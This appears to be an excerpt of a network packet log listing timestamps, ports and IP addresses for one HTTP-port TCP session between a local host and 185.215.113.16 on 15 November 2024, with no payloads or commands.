Nov 15, 2024 14:09:34.061264038 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.062952995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.063023090 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.064316034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.064352036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.064436913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.065954924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.066016912 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.066046000 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.066106081 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.068161964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.068197966 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.068231106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.068285942 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.068285942 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.071615934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.071870089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.073462963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.073513985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.073524952 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.073582888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.075288057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.075370073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.075387001 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.075460911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.077127934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.077162027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.077204943 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.077204943 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.078661919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.078699112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.078735113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.078763962 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.080260992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.080296993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.080403090 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.081553936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.081589937 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.081623077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.081630945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.081630945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.081675053 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.082858086 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.082894087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.082940102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.082940102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.084050894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.084088087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.084105968 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.084144115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.085242987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.085280895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.085334063 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.085334063 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.087965965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.088042021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.088047981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.088193893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.090769053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.090805054 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.090854883 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.090854883 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.093231916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.093274117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.093297958 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.093378067 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.095205069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.095252991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.095287085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.095297098 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.095297098 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.095329046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.097150087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.097476959 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.099056959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.099092007 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.099124908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.099170923 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.099253893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.101155996 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.101191044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.101236105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.101236105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.103122950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.103157997 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.103200912 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.103200912 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.105088949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.105140924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.105187893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.105187893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.106971979 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.107007980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.107039928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.107059002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.107059002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.107173920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.109024048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.109061956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.109123945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.109123945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.110989094 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.111114979 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.187508106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.187700033 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.187992096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.188026905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.188091993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.189646959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.189784050 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.190200090 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.190237999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.190257072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.190272093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.191782951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.191817045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.191859007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.191859007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.193516016 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.193551064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.193597078 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.195589066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.195693016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.224323034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.224651098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.224689007 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.224999905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.224999905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.226185083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.226218939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.226325989 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.228092909 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.228127956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.228193998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.229809999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.229859114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.229911089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.229911089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.231470108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.231504917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.232134104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.232909918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.232944965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.232978106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.233000040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.233000040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.233078957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.234647036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.234683037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.234708071 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.234740019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.236295938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.236955881 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.237879992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.237915993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.237947941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.237961054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.237961054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.238013029 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.239800930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.239892006 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.239939928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.239939928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.241606951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.241642952 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.241688013 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.241688013 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.243696928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.243750095 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.243762016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.243881941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.245773077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.245809078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.245841980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.245855093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.245855093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.245886087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.247427940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.247463942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.247509003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.247509003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.249092102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.249126911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.249171972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.249171972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.254582882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.254617929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.254661083 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.254661083 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.256084919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.256122112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.256145954 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.256175041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.260421038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.260457039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.260488987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.260493994 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.260545015 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.260545015 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.262027979 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.262147903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.263542891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.263609886 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.265047073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.265081882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.265132904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.265132904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.266424894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.266551971 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.269237995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.269433022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.270451069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.270487070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.270519018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.270528078 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.270528078 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.271071911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.301047087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.301167965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.301203012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.301276922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.301301003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.301879883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.302339077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.302376986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.302428007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.302428007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.303153992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.303184032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.303209066 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.303215981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.303251028 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.303251982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.303936005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.303971052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.304013968 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.304013968 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.304771900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.304807901 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.304857016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.304857016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.340831995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.341073990 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.341104031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.341128111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.341128111 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.341152906 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.341686010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.341721058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.341767073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.341767073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.342744112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.342781067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.342801094 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.342902899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.343915939 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.343967915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.344002008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.344017982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.344017982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.344126940 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.344897985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.344933033 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.344980001 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.344980001 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.345877886 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.345913887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.345956087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.345956087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.346956015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.346992016 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.347034931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.347035885 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.348191977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.348227024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.348275900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.348275900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.349735022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.349771023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.349818945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.349818945 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.350565910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.350600958 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.350646019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.350646019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.351547003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.351859093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.352319956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.352355957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.352401018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.352401018 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.353154898 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.353189945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.353235006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.353235006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.354005098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.354041100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.354083061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.354083061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.354856014 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.354901075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.354943037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.354943037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.355703115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.355739117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.355756998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.355772972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.355819941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.355819941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.356524944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.356560946 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.356580973 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.356671095 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.357335091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.357371092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.357389927 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.357547045 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.358130932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.358166933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.358211040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.358211040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.358946085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.358980894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.359021902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.359021902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.359700918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.359736919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.359774113 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.359783888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.359783888 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.359873056 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.360454082 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.360490084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.360531092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.360531092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.361304045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.361339092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.361380100 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.361380100 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.361928940 CET	80	49761	185.215.113.16	192.168.2.4
